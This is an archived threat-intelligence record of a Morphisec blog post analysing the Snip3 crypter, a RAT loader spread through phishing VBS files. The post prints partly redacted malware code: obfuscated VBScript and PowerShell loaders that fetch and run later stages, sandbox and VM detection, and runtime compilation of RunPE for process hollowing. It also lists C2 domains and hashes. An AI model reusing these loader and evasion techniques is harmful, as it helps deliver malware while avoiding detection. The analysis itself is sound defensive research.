{ "id": "a6ddee7e-25ea-43cb-b860-70330779a0f0", "created_at": "2026-04-06T00:09:05.811686Z", "updated_at": "2026-04-10T03:23:51.065862Z", "deleted_at": null, "sha1_hash": "3d86ca0f5ee2c6944e65a4e5f56a7f39d96c9565", "title": "Revealing the Snip3 Crypter, a Highly Evasive RAT Loader", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 864093, "plain_text": "Revealing the Snip3 Crypter, a Highly Evasive RAT Loader\r\nBy Nadav Lorber\r\nArchived: 2026-04-05 12:40:22 UTC\r\nMorphisec has recently monitored a highly sophisticated Crypter-as-a-Service that delivers numerous RAT families onto\r\ntarget machines.\r\nThe Crypter is most commonly delivered through phishing emails, which lead to the download of a visual basic file. In some\r\ncases, however, the attack chain starts with a large install file, such as an Adobe installer, which bundles the next stage. \r\nThis Crypter implements several advanced techniques to bypass detection, such as: \r\nExecuting PowerShell code with the ‘remotesigned’ parameter\r\nValidating the existence of Windows Sandbox and VMWare virtualization\r\nUsing Pastebin and top4top for staging\r\nCompiling RunPE loaders on the endpoint in runtime\r\nWe have named the Snip3 Crypter based on the common denominator username taken from the PDB indicator we found in\r\nan earlier variant.\r\nSnip3 Crypter Technical Details\r\nsnip3_execution_flow\r\nFigure 1 – The summarized execution flow\r\nWe classified this Crypter activity based on the following execution flow shown in Figure 1. This Crypter activity was first\r\nobserved in the wild on February 4, 2021, and still ongoing.\r\nThe related variant’s first submissions on VirusTotal demonstrate its evasive nature, as few security solutions were able to\r\ndetect it.\r\nThe First Stage: VB Script\r\nThe first stage of the attack chain is a VB Script that’s designed to load and then move the execution to the second-stage\r\nPowerShell script. We’ve identified four versions containing 11 sub-versions in this initial loader stage, with the main\r\ndifference between the four being the second-stage PowerShell loading mechanism. The main difference between the 11\r\nsub-versions is the type of obfuscation that each uses. \r\nAn interesting and unique technique here is that the script executes the PowerShell script with a -RemoteSigned parameter\r\nalong with the script as a command.\r\nVersion 1 (Seen February 4, 2021 – February 24, 2021)\r\nThis version initially decodes a PowerShell script that is executed in order to download, save, and execute the second stage\r\nPowerShell script.\r\nOnErrorResumeNext\r\nDimWSC, QwErUnBcZsAyOpLmHg\r\nQwErUnBcZsAyOpLmHg =\"POWERSHELL -EXECUTIONPOLICY REMOTESIGNED -COMMAND \"\r\nWSC =cHr(119)'Deducted, decodes to wSCrIpT.sHELl\r\nSetInBvCzAsKlOpIgHbCzAquJHyt =CreateObject(WSC)\r\nDimPlMbCdQwwTyHbZaHNbVfTH\r\nPlMbCdQwwTyHbZaHNbVfTH =cHr(73)'Deducted, decodes to PowerShell script in decimal\r\nWScript.Sleep1000\r\nInBvCzAsKlOpIgHbCzAquJHyt.RUn QwErUnBcZsAyOpLmHg \u0026 PlMbCdQwwTyHbZaHNbVfTH,0\r\nCode Block 1\r\nThe second stage PowerShell is downloaded from top4top.io, an Egpytian file hosting service. Once the second stage is\r\ndownloaded, the script executes it and saves it under ..\\AppData\\Local\\Temp\\SystemSecurity32.PS1.\r\nsnip3_code_1\r\nFigure 2 – Decoded stage 1 PowerShell\r\nNote that this PowerShell executes with the RemoteSigned parameter although the second stage executes with the Bypass\r\nparameter. This greatly decreases the efficiency of the technique; further, the bypass is no longer used starting from version\r\nhttps://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader\r\nPage 1 of 8\n\n2.\r\nAdditionally, we have observed a couple of different sub-versions for this script. These sub-versions differ in their\r\nobfuscation technique (the following example is one of them).\r\nVersion 2 (Seen 01 March 2021 – 29 March 2021)\r\nThis version contains the second stage PowerShell embedded as a string within the VBS. \r\nThe following string is decoded by an XOR function with an embedded key. This embedded key differs between each\r\nscript. \r\nPrivateFunctionvQ(Inp, Key, Mode)\r\n Dimz, i, Position, cptZahl, orgZahl, keyZahl, cptString\r\n Fori =1TolEn(Inp)\r\n Position = Position +1\r\n IfPosition \u003elEn(Key)ThenPosition =1\r\n keyZahl =aSc(Mid(Key, Position,1))\r\n IfModeThen\r\n orgZahl =aSc(Mid(Inp, i,1))\r\n cptZahl = orgZahlXorkeyZahl\r\n cptString =hEx(cptZahl)\r\n IflEn(cptString) \u003c2ThencptString =\"0\"\u0026 cptString z = z \u0026 cptString Else\r\n Ifi \u003elEn(Inp) \\2ThenExitFor\r\n cptZahl =CByte(\"\u0026\"\u0026\"H\"\u0026Mid(Inp, i *2-1,2))\r\n orgZahl = cptZahlXorkeyZahl\r\n z = z \u0026cHR(orgZahl)\r\n EndIf\r\n Next\r\n vQ = z\r\nEndFunction\r\n'Deducted code\r\nMyFile.WriteLine(REPLACE(vQ(AqUhNbgAqwpMb,\"[deducted key]\",False),\"%VBS%\", wscript.SCRIPTFULLNAME))\r\nCode Block 2\r\nOnce the string is decoded, the script replaces the place-holder %VBS% within the decoded PowerShell with the script path\r\nand saves it to the ..\\AppData\\Local\\Temp folder before the execution. Note that since the mentioned place-holder populates\r\na path containing the username in the PowerShell script, the PowerShell hash differs from victim to victim.\r\nDimSH\r\nSH =cHR(80+7) \u0026cHR(100+15) \u0026cHR(66+1) \u0026cHR(80+2) \u0026cHR(110-5) \u0026cHR(85-5) \u0026cHR(80+4)\r\n\u0026cHR(40+6) \u0026cHR(230/2) \u0026cHR(362) \u0026cHR(60+9) \u0026cHR(100+8) \u0026cHR(70+6) SetWS =CreateObject(SH)\r\nSetFSO =CreateObject(\"Scripting.FileSystemObject\") SetMyFile = FSO.CreateTextFile(FSO.GetSpecialFolder(2)\r\n+\"\\OS64Bits.PS1\",True) MyFile.WriteLine(rEPlAcE(vQ(AqUhNbgAqwpMb,\"mp1Z{RfTJ#SXV:[1c_R%5s_@W8GKbm?KK1*\r\n[bc;QVRMCjodq.#~aFWsAf2SQ-ChVd\u0026\",False),\"%VBS%\", wscript.SCRIPTFULLNAME))\r\nMyFile.Close\r\nWS.rUN\"POWERSHELL -eXEcUTiONpOLicY rEmOtEsIgNeD -FILE \"\u0026 FSO.GetSpecialFolder(2) +\"\\OS64Bits.PS1\",0\r\nCode Block 3\r\nThe following table describes the different sub-versions that we have observed:\r\nSeen Dates Powershell Name Obfuscation changes\r\n02 March 2021 WinUpdater32.PS1 Observed only PowerShell agent as payload\r\n01 March 2021 – 19 March 2021 OS64Bits.PS1 Embedded PowerShell as Hex in string\r\n09 March 2021 – 10 March 2021 OS64Bits.PS1 Added junk Chinese characters to a string\r\n10 March 2021 – 23 March 2021 Systray64.PS1 Chinese characters replaced with ‘$@#’\r\n29 March 2021 Systray64.PS1 Added another layer for XOR decoding\r\nVersion 3 (Seen April 8, 2021 – April 20, 2021)\r\nThis version is quite similar to Version 1, except that the decoded PowerShell script now uses the pastebin.com service to\r\ndownload the second stage PowerShell. This script saves that\r\nhttps://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader\r\nPage 2 of 8\n\nsecond stage under ..\\AppData\\Local\\Temp\\SysTray.PS1 and also creates a VBS within the victim’s startup folder that\r\nexecutes it to maintain persistence. Here, we have also observed a couple of sub-versions that differ by their obfuscation\r\nincluding different encoding and junk comments.\r\nsnip3_code_2\r\nFigure 3 – Pastebin stage 1 PowerShell\r\nVersion 4 (Seen April 26, 2021 – April 30, 2021)\r\nThis version is very similar to Version 3, except that the author replaced the obfuscation techniques in an attempt to discard\r\nknown IoC’s from the previous version to avoid detection. Here are a few examples of how:\r\nDifferent names for the VBS variables\r\nSaves and executes a BAT script that contains the PowerShell shown in Version 3\r\nUtilizing GetObject instead of CreateObject for retrieving the Shell object, which is a nice way to break the attack\r\nchain\r\nAdditional sub-version implemented a decryption function for the PowerShell loader within the BAT\r\nDimBAT\r\nBAT =\"Powershell -WindowStyle Hidden -Command 'IEX\r\n([System.Text.Encoding]::UTF8.GetString(@(35,82,101)))'\"'Deducted PowerShell loader\r\nSetfso =CreateObject(\"Scripting.FileSystemObject\")\r\nSetShellEX =GetObject(\"new:13709620-C279-11CE-A49E-444553540000\")\r\nDimTEMPO\r\nTEMPO = fso.getspecialfolder(2) \u0026\"\\1.bat\"\r\nSetMyFile = fso.CreateTextFile(TEMPO,True)\r\nMyFile.WriteLine(Replace(BAT,\"'\",\"\"\"\"))\r\nMyFile.Close\r\nShellEX.SHELLEXECUTE TEMPO,\"\",\"\",\"\",0\r\nCode Block 4\r\nThe Second Stage: PowerShell Script\r\nThe second stage’s PowerShell script is similar to all of the above VBS versions (with minor modifications), and seems to be\r\ndynamic based on the Crypter’s configuration.\r\nThe two main purposes of this stage are to detect virtual environments and enact a reflective load of RunPE to execute the\r\nRAT payload within a hollowed Windows process.\r\nVirtual Machine and Sandboxie Evasions\r\nIf configured by the user (adversary), the PowerShell implements functions that attempt to detect if the script is executed\r\nwithin Microsoft Sandbox, VMWare, VirtualBox, or Sandboxie environments. If the script identifies one of those virtual\r\nmachine environments, the script terminates without loading the RAT payload.\r\nNote that the author used extra measures to detect a virtual environment since the Anti-VM code that is usually seen in the\r\nwild does not detect Microsoft Sandbox (a feature introduced by Microsoft two years ago). \r\nTo detect Windows Sandbox, VMWare, or VirtualBox the script extracts the Manufacturer string and compares it to one of\r\nthe hardcoded strings. This is done by querying for a WMI class named Win32_ComputerSystem utilizing\r\nthe ManagementObjectSearcher class.\r\nFunctionVirtualMachineDetector() {\r\n$searcher= (New-ObjectSystem.Management.ManagementObjectSearcher((Binary2String(\",.,.[deducted]\")))#\r\nDeducted. decodes to ‘Select * from Win32_ComputerSystem’\r\n$items=$searcher.Get()\r\n$Tr=\"\"\r\nforeach($itemin$items) {\r\n[String]$manufacturer=$item[\"Manufacturer\"].ToString().ToLower()\r\nif(($manufacturer-eq\"microsoft corporation\"-\r\nand$item[\"Model\"].ToString().ToUpperInvariant().Contains(\"VIRTUAL\")) -or$manufacturer.Contains(\"vmware\") -\r\nor$item[\"Model\"].ToString() -eq\"VirtualBox\") {\r\n$Tr=\"True\"\r\n}\r\nelse{\r\n$Tr=\"False\"\r\nhttps://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader\r\nPage 3 of 8\n\n}\r\n}\r\nreturn$Tr\r\n}\r\nCode Block 5\r\nTo detect a Sandboxie environment, the script tries to resolve a handle to a DLL named SbieDll.dll.\r\nFunction DetectSandboxie() {\r\n[Int32] $i = ModuleHandle((Binary2String(\",.,[deducted]\"))) # Deducted. resolves to SbieDll.dll\r\n[String] $s = \"\"\r\nif ($i -eq 0) {\r\n$s = \"False\"\r\n} else {\r\n$s = \"True\"\r\n}\r\nreturn $s\r\n}\r\nCode Block 6\r\nExecuting the RAT\r\nThese days most of the RAT loaders embed or download an obfuscated, compiled code to inject a payload into a running\r\nprocess. In this case, however, the author embedded a compressed (GZIP) source code for this operation. This code is\r\ncompiled in runtime.\r\nThe source code used here is a modified version of the RunPE from the NYAN-x-CAT GitHub repository\r\n(hxxps://github[.]com/NYAN-x-CAT/CSharp-RunPE/blob/master/RunPE/RunPE.cs).\r\nBy using this technique, the author introduces an additional stealthy evasion mechanism.\r\nOnce the script is done compiling the RunPE code, the PowerShell loads and executes it along with the RAT payload and the\r\nexecutable path to hollow for injecting the payload. Most of this stage’s PowerShells are configured to\r\nhollow InstallUtil.exe, although some of them are configured to hollow RegSvcs.exe.\r\nfunction CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) { # BB = Compressed RunPE source code, $TP =\r\nNamespace and Class in RunPE, $MT = Method to execute in RunPE\r\n$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'\r\n$dictionary.Add((Binary2String(\",.,,[deducted]\".Replace(\",\", \"0\").Replace(\".\", \"1\"))),\r\n(Binary2String(\"01110[deducted]\"))) # Deducted binary encoded strings\r\n$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)\r\n$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters\r\n$CompilerParametres.ReferencedAssemblies.Add((Binary2String('010100[deducted]'))) # Deducted binary encoded\r\nstrings\r\n$CompilerParametres.ReferencedAssemblies.Add((Binary2String('010100[deducted]'))) # Deducted binary encoded\r\nstrings\r\n$CompilerParametres.ReferencedAssemblies.Add((Binary2String('010100[deducted]'))) # Deducted binary encoded\r\nstrings\r\n$CompilerParametres.ReferencedAssemblies.Add((Binary2String('011011[deducted]'))) # Deducted binary encoded\r\nstrings\r\n$CompilerParametres.ReferencedAssemblies.Add((Binary2String('010011[deducted]'))) # Deducted binary encoded\r\nstrings\r\n$CompilerParametres.IncludeDebugInformation = $false\r\n$CompilerParametres.GenerateExecutable = $false\r\n$CompilerParametres.GenerateInMemory = $true\r\n$CompilerParametres.CompilerOptions += (Binary2String(\"0010111001111001[deducted\")) # Deducted binary encoded\r\nstrings\r\n$BB = Decompress($BB) # Compressed RunPE source code\r\n[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)\r\n[Byte[]] $Bytes = Decompress(@(31,139,8,0,0)) # Deducted decimal compressed bytes (compressed payload)\r\ntry {\r\n[Object[]] $Params=@($MyPt.Replace(\"Framework64\",\"Framework\") ,$Bytes)\r\nreturn $T.GetMethod($MT).Invoke($null, $Params)\r\n} catch { }\r\n}\r\nhttps://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader\r\nPage 4 of 8\n\nCode Block 7\r\nThe Third Stage: RAT Payloads\r\nThe final payload, chosen by the user, is eventually executed within the hollowed process memory. Our analysis has mostly\r\nseen either ASyncRAT or RevengeRAT, which often come from an open-source RAT platform originally available through\r\nthe NYANxCAT Github repository (hxxps://github[.]com/NYAN-x-CAT). Note that we have also discovered the same pattern\r\nof utilizing RATs from that repository in Tracking HCrypt: An Active Crypter as a Service.\r\nIn addition, we also identified one variant that used Agent Tesla and another one that used NetWire RAT.\r\nASync RAT Panel-1\r\nFigure 4 – AsyncRAT Panel\r\nFingerprinting the Crypter’s Users (Actors) \r\nVB Script Campaigns\r\nThe following table emphasizes the different versions and IOCs that were used within the variants we observed.\r\n1st Stage\r\nVersion\r\nRAT Version C2 Used\r\nV1 (4 different\r\nsub-versions)V2\r\n(3 different sub-versions)V3 (2\r\ndifferent sub-versions)\r\nAsyncRAT 0.5.7B asin8989.ddns[.]netasin8988.ddns[.]netasin8990.ddns[.]net\r\nV3 (3 different\r\nsub-versions)V4\r\nAsyncRAT 0.5.7B adobe.myactivedirectory[.]comloading8992.bounceme[.]net\r\nV1 (4 different\r\nsub-versions)V2\r\n(2 different sub-versions)V3 (3\r\ndifferent sub-versions)V4 (2\r\ndifferent sub-versions)\r\nAsyncRAT\r\n0.5.7BRevengeRAT\r\nh0pe1759.ddns[.]net\r\nV1V2 (4\r\ndifferent sub-versions)V3 (3\r\ndifferent sub-versions)V4 (2\r\ndifferent sub-versions)\r\nRevengeRAT kimjoy.ddns[.]netkimjoy007.dyndns[.]org\r\nV2 Agent Tesla\r\nSMTP mail.alamdarhardware[.]com\r\n(sharjah@alamdarhardware[.]com)\r\nThe following table correlates with the first stage. VBS names used by the actors. Most of them related to shipping, flights,\r\nand business activities.\r\nActor (by C2) VBS Names\r\nh0pe1759.ddns[.]net\r\nSigned Flight Confirmation – 017267.vbsPlease_DocuSign_UNITYJETS.vbsFli\r\nDetails.vbsTrip Details.vbsN640SW Workscope Details.vbsCargo Flight Details\r\nDimension and Packing List Details.vbsUpdated Passenger Trip Sheet.vbs86735\r\nPresentation Details.vbsFlight Quote_7634516_SuperMid.vbsFlight Routing\r\nDetails.vbsMinutes Airbus Reliability 23-04-2021.vbsRouting Details.vbsAirbus\r\nWorldwide Symposium.vbsAirbus Family Webinar Invitation Details.vbs\r\nkimjoy.ddns[.]netkimjoy007.dyndns[.]org Signed contract.vbsFlight Details.vbsCargo Trip Detail.vbsGeneral Cargo Detail\r\n2021 (Trip itinerary).pdf.vbsCharter Details.vbsSame Day Round-15PAX _Trip\r\nhttps://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader\r\nPage 5 of 8\n\nActor (by C2) VBS Names\r\nDetails.vbsTrip itinerary Details.pdf.vbs863354765-2021 Presentation Details.vb\r\nRequest Option 2 Details.vbsACMI Cargo Details.xlsx.vbs\r\nAdobe.myactivedirectory[.]comloading8992.bounceme[.]net\r\nRfq 507890_pdf.vbsPN RD\r\n56098.pdf.vbsRFQ_115A087_202104_20_Urgent_pdf.vbsAs_4509_pdf_3BPCL\r\n(2).vbs\r\nAdditionally, the following tweet https://twitter.com/Unit42_Intel/status/1382729698791284736 from Unit42 is an example\r\nof one of the delivery techniques.\r\nNetWire RAT Embedded in Decoy Installers\r\nWe identified four different decoy installers between March 19, 2021 and March 22, 2021 that delivered Version 1 of the\r\nfirst stage. All of those variants request the second-stage PowerShell script from the same URL hosted on top4top[.]io,\r\nwhich delivers NetWire RAT. The following table covers the relevant IOCs\r\nIOC Description\r\n8add26475180ebd54629b71ba6215ca9b325afb224f9efab4affa885468f2e89 Installer decoy (Adobe Installer)\r\na2ae35821b702b7b0fd434a54afa836e69c20904664ce1ed4d3181ba2b8aa051\r\nInstaller decoy (Advanced System\r\nRepair)\r\n0c66bceb98feec7df1330747aa58ab43912f761bae263ed1c30cf17301da6d12 Installer decoy (DVDFab downloader)\r\n17f4e321b80d36a9235c8f8ca6794a07dd1634bb50ae1a745d28bad014869173 Installer decoy (Movavi Video Converter)\r\n2nd stage PowerShell URL hxxps://i.top4top[.]io/m_1891i29ay1.mp4\r\nNetWire RAT C2 alice2019.myftp[.]biz\r\nFingerprinting the Crypter’s Author \r\nSince the author tends to change the code patterns and did a good job avoiding the usage of unique artifacts, it’s almost\r\nimpossible to correlate this activity with anything else.\r\nThe unique artifact that we found is the RunPE source code’s namespace and class names – ProjFUD.PA.\r\nThe following string assisted us with discovering what we believe is one of the authors’ earlier variants that contains the\r\nexact RunPE code. However, in this case, it’s embedded as a precompiled DLL. This scavenge provided us with the\r\nfollowing PDB string from the DLL:\r\nC:\\Users\\Snip3\\OneDrive\\Bureau\\Sparta Project\\projFUD\\projFUD\\obj\\Debug\\projFUD.pdb\r\nWith the following PDB string, we discovered additional variants that we believe are from the same author due to repeating\r\npatterns within the code flow. Here are a few examples:\r\nC:\\Users\\Snip3\\source\\repos\\CSClipper\\CSClipper\\obj\\Debug\\CSClipper.pdbC:\\Users\\Snip3\\source\\repos\\Startup\\Startup\\obj\\Debug\\fdgerttry.p\r\nCrypter v4\\Deep Crypter v4\\obj\\Debug\\Deep Crypter\r\nv4.pdbC:\\Users\\Snip3\\source\\repos\\Mozilla\\Mozilla\\obj\\Debug\\Mozilla.pdb\r\nFurther investigation led to a personal identity that we strongly believe is the author of these malicious activities. \r\nConclusion\r\nThe Snip3 Crypter’s ability to identify sandboxing and virtual environments make it especially capable of bypassing\r\ndetection-centric solutions. As a result, organizations with detection-focused stacks need to be wary of attacks like Snip3 and\r\nothers. Morphisec customers can rest easy that they are protected against the evasive techniques Snip3 and other attacks like\r\nit employ. \r\nSee Morphisec AMTD in action — book a demo today.\r\nhttps://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader\r\nPage 6 of 8\n\nIOCs\r\nFirst Stage .VBS Hashes\r\n64afcb90ecba8af5124dd17d3486da7e40010641ee016fece0f3edf08e24e372ac4f554d93627a4b00821177189b2dcf245daa5740e507a459487c5a5aaf7a163afff943\r\nSecond Stage PowerShell Hashes (without mentioned Version 2 because of dynamic path)\r\na46f4721441cbabed3a8dc3be2a63cc7820d619ee8e612923d19f4b418a4830200381ab5055eadf6e2e3d3b54519b2fad6b70354c3e7efc44a3dc81c8035722861b335f2\r\nSecond stage PowerShell Delivering URLs\r\nhxxps://pastebin[.]com/raw/JjwexYsshxxps://pastebin[.]com/raw/esCeQbKuhxxps://pastebin[.]com/raw/1grXhFpUhxxps://pastebin[.]com/raw/Y61u\r\nBAT Script Hashes (Used in VBS Version 4)\r\n52ec383c880523d12cec868c201e643e05ad817625527dbcb9be53f6c36b202bd6d712cf32ddc695d1b79d888960e18f1134f2009fe43833da5f3b1a84651a996e6c0278\r\nRAT Payload Hashes\r\n23d4837df84a76f96c674581c96e6a1729bac2981787d3b36ac5149d861f13e5aefeb07afc0d9f4d09ab09317db14edef1b58df175f70cf6ea88d7f6cdce8cfcd452cee9\r\nRAT C2 Domains\r\nadobe.myactivedirectory[.]com\r\nloading8992.bounceme[.]net\r\nasin8989.ddns[.]net\r\nasin8988.ddns[.]net\r\nasin8990.ddns[.]net\r\nhousecommand.duckdns[.]org\r\nkingslanddomain.ddns[.]net\r\nh0pe1759.ddns[.]net\r\nkimjoy.ddns[.]netkimjoy007.dyndns[.]org\r\nn0ahark2021.ddns[.]net\r\nbodmas01.zapto[.]org\r\nbuiltx.ddns[.]net\r\nsharjah@alamdarhardware[.]comalice2019.myftp[.]bizfranco.ddns[.]net\r\nRelated variants from hunting for the PDB path\r\n74b35b4efbb35be941747e075989cca934ddf075a27d2ed84c55ac018190f2071162f338d95149e78b06479cbf8434ad5dfe0ef42913be4ccd2237f6425d1551f65d048d\r\nAbout the author\r\nhttps://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader\r\nPage 7 of 8\n\nNadav Lorber\r\nSecurity Research Tech Lead\r\nNadav Lorber is a leader on Morphisec’s cutting-edge threat research team. He began his career in threat intelligence in\r\n2013, where he was a SOC Specialist for the Israeli government’s military intelligence department. Since joining Morphisec,\r\nNadav has helped uncover key insights on topics like Jupyter Infostealer, Log4j, and the Snip3 crypter.\r\nSource: https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader\r\nhttps://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "references": [ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader" ], "report_names": [ "revealing-the-snip3-crypter-a-highly-evasive-rat-loader" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434145, "ts_updated_at": 1775791431, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3d86ca0f5ee2c6944e65a4e5f56a7f39d96c9565.pdf", "text": "https://archive.orkl.eu/3d86ca0f5ee2c6944e65a4e5f56a7f39d96c9565.txt", "img": "https://archive.orkl.eu/3d86ca0f5ee2c6944e65a4e5f56a7f39d96c9565.jpg" } }